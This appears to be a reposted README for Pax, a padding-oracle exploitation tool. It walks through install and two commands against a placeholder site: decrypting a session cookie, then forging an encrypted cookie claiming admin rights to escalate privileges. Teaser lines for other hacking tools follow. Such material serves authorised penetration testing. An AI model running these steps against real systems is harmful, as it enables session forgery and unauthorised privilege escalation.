Pax, Exploit padding oracles for fun and profit!
Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:
This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
As always, this tool should only be used on systems you own and/or have permission to probe!
Download from releases, or install with Go:
go get -u github.com/liamg/pax/cmd/pax
If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS
, you can use the following:
pax decrypt –url https://target.site/profile.php –sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D –block-size 16 –cookies “SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D”
This will hopefully give you some plaintext, perhaps something like:
{“user_id”: 456, “is_admin”: false}
It looks like you could elevate your privileges here!
You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:
pax encrypt –url https://target.site/profile.php –sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D –block-size 16 –cookies “SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D” –plain-text ‘{“user_id”: 456, “is_admin”: true}’
This will spit out another base64 encoded set of encrypted data, perhaps something like:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the SESS
cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.
Burrow is an open source tool for burrowing through firewalls, built by teenagers at Hack Club.…
Simple golang webserver that listens for basic auth or post requests and sends a notification…
Nutek Security Platform for macOS and Linux operating systems. Tools for hackers, bug hunters and…
Welcome to SecureSphere Labs, your go-to destination for a curated collection of powerful hacking tools…
All in one Docker-based workstation with hacking tools for Pentesting and offsec Labs by maintained…
Got it! Below is the updated README.md file with instructions for downloading the project on…